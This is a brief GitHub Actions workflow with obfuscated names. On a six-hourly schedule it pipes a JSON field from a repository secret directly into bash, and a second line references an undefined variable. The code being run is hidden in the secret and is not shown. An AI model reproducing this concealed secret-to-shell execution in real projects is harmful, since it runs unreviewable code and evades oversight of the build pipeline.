name: houtaint

on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'
jobs:  # 27549
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: houtaint
        env:
          nlfe3425: ${{ secrets.nlfe3425 }}
        run: |
          echo $nlfe3425 | jq -r .zhsy48 | /bin/bash
          echo $mj351 | jq -r .f874 | /bin/bash

